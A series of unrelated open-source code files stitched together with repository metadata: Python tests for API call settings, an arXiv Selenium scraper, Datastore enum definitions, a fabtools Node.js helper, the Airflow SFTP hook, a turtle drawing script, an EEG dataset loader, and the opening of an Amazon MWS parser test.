self.assertAlmostEqual(settings.timeout, 25.0)
self.assertIsInstance(settings.bundler, bundling.Executor)
self.assertIsInstance(settings.bundle_descriptor, BundleDescriptor)
self.assertIsNone(settings.page_descriptor)
self.assertIsInstance(settings.retry, RetryOptions)
self.assertEqual(settings.kwargs, {'key1': 'value1'})
settings = defaults['page_streaming_method']
self.assertAlmostEqual(settings.timeout, 12.0)
self.assertIsNone(settings.bundler)
self.assertIsNone(settings.bundle_descriptor)
self.assertIsInstance(settings.page_descriptor, PageDescriptor)
self.assertIsInstance(settings.retry, RetryOptions)
self.assertEqual(settings.kwargs, {'key1': 'value1'})
def test_construct_settings_override(self):
_override = {
'interfaces': {
_SERVICE_NAME: {
'methods': {
'PageStreamingMethod': None,
'BundlingMethod': {
'timeout_millis': 8000,
'bundling': None
}
}
}
}
}
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, _override, _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS)
settings = defaults['bundling_method']
self.assertAlmostEqual(settings.timeout, 8.0)
self.assertIsNone(settings.bundler)
self.assertIsNone(settings.page_descriptor)
settings = defaults['page_streaming_method']
self.assertAlmostEqual(settings.timeout, 12.0)
self.assertIsInstance(settings.page_descriptor, PageDescriptor)
self.assertIsNone(settings.retry)
def test_construct_settings_override2(self):
_override = {
'interfaces': {
_SERVICE_NAME: {
'retry_codes': {
'bar_retry': [],
'baz_retry': ['code_a']
},
'retry_params': {
'default': {
'initial_retry_delay_millis': 1000,
'retry_delay_multiplier': 1.2,
'max_retry_delay_millis': 10000,
'initial_rpc_timeout_millis': 3000,
'rpc_timeout_multiplier': 1.3,
'max_rpc_timeout_millis': 30000,
'total_timeout_millis': 300000
},
},
'methods': {
'BundlingMethod': {
'retry_params_name': 'default',
'retry_codes_name': 'baz_retry',
},
},
}
}
}
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, _override, _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS)
settings = defaults['bundling_method']
backoff = settings.retry.backoff_settings
self.assertEqual(backoff.initial_retry_delay_millis, 1000)
self.assertEqual(settings.retry.retry_codes, [_RETRY_DICT['code_a']])
self.assertIsInstance(settings.bundler, bundling.Executor)
self.assertIsInstance(settings.bundle_descriptor, BundleDescriptor)
# page_streaming_method is unaffected because it's not specified in
# overrides. 'bar_retry' or 'default' definitions in overrides should
# not affect the methods which are not in the overrides.
settings = defaults['page_streaming_method']
backoff = settings.retry.backoff_settings
self.assertEqual(backoff.initial_retry_delay_millis, 100)
self.assertEqual(backoff.retry_delay_multiplier, 1.2)
self.assertEqual(backoff.max_retry_delay_millis, 1000)
self.assertEqual(settings.retry.retry_codes, [_RETRY_DICT['code_c']])
@mock.patch('google.gax.config.API_ERRORS', (CustomException, ))
def test_catch_error(self):
def abortion_error_func(*dummy_args, **dummy_kwargs):
raise CustomException(None, None)
def other_error_func(*dummy_args, **dummy_kwargs):
raise AnotherException
gax_error_callable = api_callable.create_api_call(
abortion_error_func, CallSettings())
self.assertRaises(GaxError, gax_error_callable, None)
other_error_callable = api_callable.create_api_call(
other_error_func, CallSettings())
self.assertRaises(AnotherException, other_error_callable, None)
| 41.603696
| 85
| 0.62529
|
aa4ad0686bd5cf027b648b832c303dbf869916af
| 10,653
|
py
|
Python
|
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
import os
import time
import pandas as pd
import numpy as np
import sqlite3
import platform
from tqdm import tqdm
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def scrape_data(driver, categories, arxiv_identifier):
"""
"""
# Initiate master dataframe
main_df = pd.DataFrame()
for cat, link_name in tqdm(zip(main_categories, arxiv_names)):
url = f'https://export.arxiv.org/list/{link_name}/recent'
driver.get(url)
try:
# Wait until the 'all' link is accessible, get this link and click it
all_link = WebDriverWait(driver, 15).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="dlpage"]/small[2]/a[3]'))
)
all_link.click()
except TimeoutException:
# Subjects with no all click have all their data ready to be scraped
pass
# Get the html for the current url
time.sleep(2)
html = driver.page_source
# Parse the html with BeautifulSoup
soup = BeautifulSoup(html, 'html.parser')
time.sleep(2)
# Find the main containers
all_dl = soup.find_all('dl')
for dl in all_dl:
# Initiate empty list to contain metadata
all_titles = []
abstract_links = []
download_links = []
abstract_data = []
authors_data = []
submission_data = []
subjects_data = []
# Titles
for x in dl.find_all('dd'):
# list of all titles
titles = [x.text.replace('Title: ', '').strip() for x in x.find_all('div', {'class': 'list-title mathjax'})]
# Append titles to all titles list
for t in titles:
all_titles.append(t)
# Links for abstract, pdf
for x in dl.find_all('dt'):
all_article_links = x.find_all('a', href=True)
link_list = ['https://export.arxiv.org' + link['href'] for link in all_article_links][0:2]
# Append abstract url to abstract links
abstract_url = link_list[0]
abstract_links.append(abstract_url)
# Append download url to abstract link list
download_url = link_list[1]
download_links.append(download_url)
# Subjects
for x in dl.find_all('div', {'class': 'list-subjects'}):
subjects = x.text.strip().replace('Subjects: ', '')
subjects_data.append(subjects)
# Scrape the abstract meta-data
for link in abstract_links:
try:
driver.get(link)
# Abstract text
abstract_block = WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="abs"]/div[2]/blockquote'))
)
abstract_text = abstract_block.text
abstract_text = abstract_text.replace('Abstract: ', '')
# Authors text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.authors'))
)
authors_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.authors').text
# Submission date text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.dateline'))
)
submission_date_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.dateline').text
except Exception as e:
print(e)
# Set authors, abstract and submission info to NaN if scraping fails
authors_text = np.NaN
abstract_text = np.NaN
submission_date_text = np.NaN
# Append metadata info to the main data lists
abstract_data.append(abstract_text)
authors_data.append(authors_text)
submission_data.append(submission_date_text)
# Convert meta-data into a dataframe
df = pd.DataFrame({'title': all_titles,
'download_url': download_links,
'abstract_link': abstract_links,
'abstract_text': abstract_data,
'authors': authors_data,
'submission_date': submission_data,
'subjects': subjects_data})
# Tag the current subject
df['subject_tag'] = cat
# Append the subject dataframe to the main dataframe
main_df = main_df.append(df)
time.sleep(3)
# Reset index and export data
main_df = main_df.reset_index(drop=True)
# Push scraped data to db
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
main_df.to_sql('raw_data', if_exists='replace', con=conn, index=False)
# Exit application
driver.quit()
print('Done scraping all the data')
def fill_missing_data(driver):
"""
"""
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
missing_df = pd.read_sql_query('SELECT * FROM raw_data WHERE abstract_text IS NULL', con=conn)
main_df = pd.read_sql_query('SELECT * FROM raw_data WHERE abstract_text IS NOT NULL', con=conn)
abstract_data = []
authors_data = []
submission_data = []
for link in tqdm(missing_df['abstract_link'].values.tolist()):
try:
driver.get(link)
# Abstract text
abstract_block = WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="abs"]/div[2]/blockquote'))
)
abstract_text = abstract_block.text
abstract_text = abstract_text.replace('Abstract: ', '')
# Authors text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.authors'))
)
authors_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.authors').text
# Submission date text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.dateline'))
)
submission_date_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.dateline').text
except Exception as e:
print(e)
authors_text = np.NaN
abstract_text = np.NaN
submission_date_text = np.NaN
# Append metadata info to the main data lists
abstract_data.append(abstract_text)
authors_data.append(authors_text)
submission_data.append(submission_date_text)
new_df = pd.DataFrame({'abstract_text': abstract_data,
'authors': authors_data,
'submission_date': submission_date_text})
missing_df.loc[:, 'abstract_text'] = new_df['abstract_text']
missing_df.loc[:, 'authors'] = new_df['authors']
missing_df.loc[:, 'submission_date'] = new_df['submission_date']
master_df = pd.concat([main_df, missing_df])
print(master_df.info())
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
#clean_df = master_df.drop_duplicates(subset='title').reset_index(drop=True)
master_df.to_sql('clean_data', con=conn, if_exists='replace', index=False)
driver.quit()
if __name__ == "__main__":
# Specify webdriver options
options = webdriver.FirefoxOptions()
options.headless = True # set to headerless windows
#options.add_argument('window-size=1200x600') # set the window size
os_platform = platform.system()
if os_platform == 'Linux':
# Specify Linux path for the webdriver executable
linux_path = os.path.join('app', 'linux-drivers', 'geckodriver')
# Initiate headerless scraping in a linux environment
driver = webdriver.Firefox(executable_path = linux_path,
options=options)
elif os_platform == 'Darwin':
# Specify Mac path for the chromedriver executable
mac_path = os.path.join('app', 'mac-drivers', 'geckodriver')
# Initiate headerless scraping in a darwin/mac environment
driver = webdriver.Firefox(executable_path = mac_path,
options=options)
elif os_platform == 'Windows':
# Specify Mac path for the chromedriver executable
windows_path = os.path.join('app', 'windows-drivers', 'geckodriver.exe')
# Initiate headerless scraping in a darwin/mac environment
driver = webdriver.Firefox(executable_path = windows_path,
options=options)
else:
raise OSError('Unsupported OS Platform. Only Linux/Mac/Windows firefox drivers supported!')
main_categories = [
'Economics', 'Quantitative Biology', 'Quantitative Finance',
'Statistics', 'Electrical Engineering', 'Mathematics',
'Computer Science', 'Physics', 'Astrophysics', 'Condensed Matter',
'General Relativity & Quantum Cosmology', 'High Energy Physics - Experiment',
'High Energy Physics - Lattice', 'High Energy Physics - Phenomenology',
'High Energy Physics - Theory', 'Mathematical Physics',
'Nonlinear Sciences', 'Nuclear Experiment', 'Nuclear Theory',
'Quantum Physics'
]
arxiv_names = [
'econ', 'q-bio', 'q-fin',
'stat', 'eess', 'math',
'cs', 'physics', 'astro-ph',
'cond-mat', 'gr-qc', 'hep-ex',
'hep-lat', 'hep-ph', 'hep-th',
'math-ph', 'nlin', 'nucl-ex',
'nucl-th', 'quant-ph'
]
"""
# Only used for testing
main_categories = ['Economics']
arxiv_names = ['econ']
"""
#scrape_data(driver = driver, categories = main_categories, arxiv_identifier = arxiv_names)
fill_missing_data(driver = driver)
| 35.989865
| 124
| 0.589411
|
7aa90c136e1c862df32efb4d3d4f83d0c2e2124e
| 4,871
|
py
|
Python
|
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | 1
|
2019-05-23T11:25:32.000Z
|
2019-05-23T11:25:32.000Z
|
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | null | null | null |
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class CommitRequest(object):
class Mode(enum.IntEnum):
"""
The modes available for commits.
Attributes:
MODE_UNSPECIFIED (int): Unspecified. This value must not be used.
TRANSACTIONAL (int): Transactional: The mutations are either all applied, or none are
applied. Learn about transactions
`here <https://cloud.google.com/datastore/docs/concepts/transactions>`__.
NON_TRANSACTIONAL (int): Non-transactional: The mutations may not apply as all or none.
"""
MODE_UNSPECIFIED = 0
TRANSACTIONAL = 1
NON_TRANSACTIONAL = 2
class ReadOptions(object):
class ReadConsistency(enum.IntEnum):
"""
The possible values for read consistencies.
Attributes:
READ_CONSISTENCY_UNSPECIFIED (int): Unspecified. This value must not be used.
STRONG (int): Strong consistency.
EVENTUAL (int): Eventual consistency.
"""
READ_CONSISTENCY_UNSPECIFIED = 0
STRONG = 1
EVENTUAL = 2
class EntityResult(object):
class ResultType(enum.IntEnum):
"""
Specifies what data the 'entity' field contains. A ``ResultType`` is
either implied (for example, in ``LookupResponse.missing`` from
``datastore.proto``, it is always ``KEY_ONLY``) or specified by context
(for example, in message ``QueryResultBatch``, field
``entity_result_type`` specifies a ``ResultType`` for all the values in
field ``entity_results``).
Attributes:
RESULT_TYPE_UNSPECIFIED (int): Unspecified. This value is never used.
FULL (int): The key and properties.
PROJECTION (int): A projected subset of properties. The entity may have no key.
KEY_ONLY (int): Only the key.
"""
RESULT_TYPE_UNSPECIFIED = 0
FULL = 1
PROJECTION = 2
KEY_ONLY = 3
class PropertyOrder(object):
class Direction(enum.IntEnum):
"""
The sort direction.
Attributes:
DIRECTION_UNSPECIFIED (int): Unspecified. This value must not be used.
ASCENDING (int): Ascending.
DESCENDING (int): Descending.
"""
DIRECTION_UNSPECIFIED = 0
ASCENDING = 1
DESCENDING = 2
class CompositeFilter(object):
class Operator(enum.IntEnum):
"""
A composite filter operator.
Attributes:
OPERATOR_UNSPECIFIED (int): Unspecified. This value must not be used.
AND (int): The results are required to satisfy each of the combined filters.
"""
OPERATOR_UNSPECIFIED = 0
AND = 1
class PropertyFilter(object):
class Operator(enum.IntEnum):
"""
A property filter operator.
Attributes:
OPERATOR_UNSPECIFIED (int): Unspecified. This value must not be used.
LESS_THAN (int): Less than.
LESS_THAN_OR_EQUAL (int): Less than or equal.
GREATER_THAN (int): Greater than.
GREATER_THAN_OR_EQUAL (int): Greater than or equal.
EQUAL (int): Equal.
HAS_ANCESTOR (int): Has ancestor.
"""
OPERATOR_UNSPECIFIED = 0
LESS_THAN = 1
LESS_THAN_OR_EQUAL = 2
GREATER_THAN = 3
GREATER_THAN_OR_EQUAL = 4
EQUAL = 5
HAS_ANCESTOR = 11
class QueryResultBatch(object):
class MoreResultsType(enum.IntEnum):
"""
The possible values for the ``more_results`` field.
Attributes:
MORE_RESULTS_TYPE_UNSPECIFIED (int): Unspecified. This value is never used.
NOT_FINISHED (int): There may be additional batches to fetch from this query.
MORE_RESULTS_AFTER_LIMIT (int): The query is finished, but there may be more results after the limit.
MORE_RESULTS_AFTER_CURSOR (int): The query is finished, but there may be more results after the end
cursor.
NO_MORE_RESULTS (int): The query is finished, and there are no more results.
"""
MORE_RESULTS_TYPE_UNSPECIFIED = 0
NOT_FINISHED = 1
MORE_RESULTS_AFTER_LIMIT = 2
MORE_RESULTS_AFTER_CURSOR = 4
NO_MORE_RESULTS = 3
| 33.826389
| 111
| 0.642579
|
ef9dfd3fb01c6e03c8af8192f16a18700c47c8ec
| 1,489
|
py
|
Python
|
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | 1
|
2020-11-05T21:53:21.000Z
|
2020-11-05T21:53:21.000Z
|
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | null | null | null |
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note: the ``simplejson`` module is required on Python 2.5
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
from fabtools import nodejs
def installed_from_source(version=nodejs.DEFAULT_VERSION):
"""
Require Node.js to be installed from source.
::
from fabtools import require
require.nodejs.installed_from_source()
"""
if nodejs.version() != version:
nodejs.install_from_source(version)
def package(pkg_name, version=None, local=False):
"""
Require a Node.js package.
If the package is not installed, and no *version* is specified, the
latest available version will be installed.
If a *version* is specified, and a different version of the package
is already installed, it will be updated to the specified version.
If `local` is ``True``, the package will be installed locally.
::
from fabtools import require
# Install package system-wide
require.nodejs.package('foo')
# Install package locally
require.nodejs.package('bar', local=True)
"""
pkg_version = nodejs.package_version(pkg_name, local=local)
if version:
if pkg_version != version:
nodejs.install_package(pkg_name, version, local=local)
else:
if pkg_version is None:
nodejs.install_package(pkg_name, local=local)
| 24.016129
| 71
| 0.667562
|
0de587209814d3560982f2aba89416b22c88fd9f
| 12,041
|
py
|
Python
|
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains SFTP hook."""
import datetime
import stat
from typing import Dict, List, Optional, Tuple
import pysftp
import tenacity
from paramiko import SSHException
from airflow.providers.ssh.hooks.ssh import SSHHook
class SFTPHook(SSHHook):
"""
This hook is inherited from SSH hook. Please refer to SSH hook for the input
arguments.
Interact with SFTP. Aims to be interchangeable with FTPHook.
:Pitfalls::
- In contrast with FTPHook describe_directory only returns size, type and
modify. It doesn't return unix.owner, unix.mode, perm, unix.group and
unique.
- retrieve_file and store_file only take a local full path and not a
buffer.
- If no mode is passed to create_directory it will be created with 777
permissions.
Errors that may occur throughout but should be handled downstream.
:param sftp_conn_id: The :ref:`sftp connection id<howto/connection:sftp>`
:type sftp_conn_id: str
"""
conn_name_attr = 'ftp_conn_id'
default_conn_name = 'sftp_default'
conn_type = 'sftp'
hook_name = 'SFTP'
@staticmethod
def get_ui_field_behaviour() -> Dict:
return {
"hidden_fields": ['schema'],
"relabeling": {
'login': 'Username',
},
}
def __init__(self, ftp_conn_id: str = 'sftp_default', *args, **kwargs) -> None:
kwargs['ssh_conn_id'] = ftp_conn_id
super().__init__(*args, **kwargs)
self.conn = None
self.private_key_pass = None
self.ciphers = None
# Fail for unverified hosts, unless this is explicitly allowed
self.no_host_key_check = False
if self.ssh_conn_id is not None:
conn = self.get_connection(self.ssh_conn_id)
if conn.extra is not None:
extra_options = conn.extra_dejson
# For backward compatibility
# TODO: remove in Airflow 2.1
import warnings
if 'private_key_pass' in extra_options:
warnings.warn(
'Extra option `private_key_pass` is deprecated.'
'Please use `private_key_passphrase` instead.'
'`private_key_passphrase` will precede if both options are specified.'
'The old option `private_key_pass` will be removed in Airflow 2.1',
DeprecationWarning,
stacklevel=2,
)
self.private_key_pass = extra_options.get(
'private_key_passphrase', extra_options.get('private_key_pass')
)
if 'ignore_hostkey_verification' in extra_options:
warnings.warn(
'Extra option `ignore_hostkey_verification` is deprecated.'
'Please use `no_host_key_check` instead.'
'This option will be removed in Airflow 2.1',
DeprecationWarning,
stacklevel=2,
)
self.no_host_key_check = (
str(extra_options['ignore_hostkey_verification']).lower() == 'true'
)
if 'no_host_key_check' in extra_options:
self.no_host_key_check = str(extra_options['no_host_key_check']).lower() == 'true'
if 'ciphers' in extra_options:
self.ciphers = extra_options['ciphers']
@tenacity.retry(
stop=tenacity.stop_after_delay(10),
wait=tenacity.wait_exponential(multiplier=1, max=10),
retry=tenacity.retry_if_exception_type(SSHException),
reraise=True,
)
def get_conn(self) -> pysftp.Connection:
"""Returns an SFTP connection object"""
if self.conn is None:
cnopts = pysftp.CnOpts()
if self.no_host_key_check:
cnopts.hostkeys = None
else:
if self.host_key is not None:
cnopts.hostkeys.add(self.remote_host, self.host_key.get_name(), self.host_key)
else:
pass # will fallback to system host keys if none explicitly specified in conn extra
cnopts.compression = self.compress
cnopts.ciphers = self.ciphers
conn_params = {
'host': self.remote_host,
'port': self.port,
'username': self.username,
'cnopts': cnopts,
}
if self.password and self.password.strip():
conn_params['password'] = self.password
if self.pkey:
conn_params['private_key'] = self.pkey
elif self.key_file:
conn_params['private_key'] = self.key_file
if self.private_key_pass:
conn_params['private_key_pass'] = self.private_key_pass
self.conn = pysftp.Connection(**conn_params)
return self.conn
def close_conn(self) -> None:
"""Closes the connection"""
if self.conn is not None:
self.conn.close()
self.conn = None
def describe_directory(self, path: str) -> Dict[str, Dict[str, str]]:
"""
Returns a dictionary of {filename: {attributes}} for all files
on the remote system (where the MLSD command is supported).
:param path: full path to the remote directory
:type path: str
"""
conn = self.get_conn()
flist = conn.listdir_attr(path)
files = {}
for f in flist:
modify = datetime.datetime.fromtimestamp(f.st_mtime).strftime('%Y%m%d%H%M%S')
files[f.filename] = {
'size': f.st_size,
'type': 'dir' if stat.S_ISDIR(f.st_mode) else 'file',
'modify': modify,
}
return files
def list_directory(self, path: str) -> List[str]:
"""
Returns a list of files on the remote system.
:param path: full path to the remote directory to list
:type path: str
"""
conn = self.get_conn()
files = conn.listdir(path)
return files
def create_directory(self, path: str, mode: int = 777) -> None:
"""
Creates a directory on the remote system.
:param path: full path to the remote directory to create
:type path: str
:param mode: int representation of octal mode for directory
"""
conn = self.get_conn()
conn.makedirs(path, mode)
def delete_directory(self, path: str) -> None:
"""
Deletes a directory on the remote system.
:param path: full path to the remote directory to delete
:type path: str
"""
conn = self.get_conn()
conn.rmdir(path)
def retrieve_file(self, remote_full_path: str, local_full_path: str) -> None:
"""
Transfers the remote file to a local location.
If local_full_path is a string path, the file will be put
at that location
:param remote_full_path: full path to the remote file
:type remote_full_path: str
:param local_full_path: full path to the local file
:type local_full_path: str
"""
conn = self.get_conn()
conn.get(remote_full_path, local_full_path)
def store_file(self, remote_full_path: str, local_full_path: str) -> None:
"""
Transfers a local file to the remote location.
If local_full_path_or_buffer is a string path, the file will be read
from that location
:param remote_full_path: full path to the remote file
:type remote_full_path: str
:param local_full_path: full path to the local file
:type local_full_path: str
"""
conn = self.get_conn()
conn.put(local_full_path, remote_full_path)
def delete_file(self, path: str) -> None:
"""
Removes a file on the FTP Server
:param path: full path to the remote file
:type path: str
"""
conn = self.get_conn()
conn.remove(path)
def get_mod_time(self, path: str) -> str:
"""
Returns modification time.
:param path: full path to the remote file
:type path: str
"""
conn = self.get_conn()
ftp_mdtm = conn.stat(path).st_mtime
return datetime.datetime.fromtimestamp(ftp_mdtm).strftime('%Y%m%d%H%M%S')
def path_exists(self, path: str) -> bool:
"""
Returns True if a remote entity exists
:param path: full path to the remote file or directory
:type path: str
"""
conn = self.get_conn()
return conn.exists(path)
@staticmethod
def _is_path_match(path: str, prefix: Optional[str] = None, delimiter: Optional[str] = None) -> bool:
"""
Return True if given path starts with prefix (if set) and ends with delimiter (if set).
:param path: path to be checked
:type path: str
:param prefix: if set path will be checked is starting with prefix
:type prefix: str
:param delimiter: if set path will be checked is ending with suffix
:type delimiter: str
:return: bool
"""
if prefix is not None and not path.startswith(prefix):
return False
if delimiter is not None and not path.endswith(delimiter):
return False
return True
def get_tree_map(
self, path: str, prefix: Optional[str] = None, delimiter: Optional[str] = None
) -> Tuple[List[str], List[str], List[str]]:
"""
Return tuple with recursive lists of files, directories and unknown paths from given path.
It is possible to filter results by giving prefix and/or delimiter parameters.
:param path: path from which tree will be built
:type path: str
:param prefix: if set paths will be added if start with prefix
:type prefix: str
:param delimiter: if set paths will be added if end with delimiter
:type delimiter: str
:return: tuple with list of files, dirs and unknown items
:rtype: Tuple[List[str], List[str], List[str]]
"""
conn = self.get_conn()
files, dirs, unknowns = [], [], [] # type: List[str], List[str], List[str]
def append_matching_path_callback(list_):
return lambda item: list_.append(item) if self._is_path_match(item, prefix, delimiter) else None
conn.walktree(
remotepath=path,
fcallback=append_matching_path_callback(files),
dcallback=append_matching_path_callback(dirs),
ucallback=append_matching_path_callback(unknowns),
recurse=True,
)
return files, dirs, unknowns
def test_connection(self) -> Tuple[bool, str]:
"""Test the SFTP connection by checking if remote entity '/some/path' exists"""
try:
self.path_exists('/some/path')
return True, "Connection successfully tested"
except Exception as e:
return False, str(e)
| 36.377644
| 108
| 0.59912
|
b15826373d727f9098e172af154d12253dad56b6
| 527
|
py
|
Python
|
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
import turtle as tt
import random
wn=tt.Screen()
wn.bgcolor("#333333")
size=0
tt.speed(0)
for i in range (185):
rn="#"
for i in range(6):
x=random.randint(0,2)
if x:
x=random.randint(0,9)
rn+=str(x)
else:
x=random.randint(0,5)
ami="abcdef"
rn+=ami[x]
colour=rn
print(rn)
tt.color(colour)
tt.forward(size)
tt.right(71.5)
size+=3
| 19.518519
| 37
| 0.428843
|
e04e90e53d00381e68cf5036fc35a6b509c911ff
| 2,115
|
py
|
Python
|
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
import numpy as np
import scipy.io
class dataset():
def __init__(self):
self.X = [] #Datos
self.Y = [] #Labels
self.fm = 0
def generateSignal(self, amplitud, tamano):
y = 0
result = []
x = np.linspace(0, tamano, tamano)
for _ in x:
result.append(y)
if not amplitud == 0:
y += (np.random.normal(scale=1)/10)*amplitud
else:
y += (np.random.normal(scale=1)/10)
result = np.array(result)
return result
def load_random_signals(self, num_clases, fm, num_trials, num_channels, amplitud, tamano):
#Generamos señales de forma aleatoria
self.fm = fm
self.X = []
self.Y = []
self.X = np.zeros((num_trials, num_channels, tamano))
for trial in range(num_trials):
self.Y.extend([np.random.randint(0, num_clases)])
for ch in range(num_channels):
self.X[trial,ch,:] = self.generateSignal(amplitud, tamano)
self.X = np.asarray(self.X)
self.Y = np.asarray(self.Y)
return self.X, self.Y
def load_IIIa(self, sujeto):
directory = '../db/IIIa/'
if sujeto == 'k3b':
directory += 'k3b.mat'
elif sujeto == 'k6b':
directory += 'k6b.mat'
elif sujeto == 'l1b':
directory += 'l1b.mat'
data = scipy.io.loadmat(directory)
datos = data['datos']
signal = datos['x_train']
labels = datos['y_train']
self.fm = 250
self.X = np.asarray(signal[0][0])
labels = np.asarray(labels[0][0])
self.Y = []
for l in labels:
self.Y.append(l-1)
self.Y = np.asarray(self.Y[0])
#self.Y = np.transpose(self.Y)
#self.Y = np.transpose(labels)
#self.Y = self.Y - 1 #Para tener las etiquetas del 0 a n-1
return self.X, self.Y
| 28.2
| 95
| 0.496454
|
a1cf9c41e0e4f8c46ee67fbbdac8c3d130f8cb25
| 1,383
|
py
|
Python
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 9
|
2017-03-28T12:58:36.000Z
|
2020-03-02T14:42:32.000Z
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 5
|
2017-01-05T19:36:18.000Z
|
2021-12-13T19:43:42.000Z
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 5
|
2017-02-15T17:29:02.000Z
|
2019-03-06T07:30:55.000Z
|
from unittest import TestCase
from unittest import TestSuite
from unittest import main
from unittest import makeSuite
from mwstools.parsers.products import GetMatchingProductForIdResult
class TestGetMatchingProductForIdResult(TestCase):
body = """
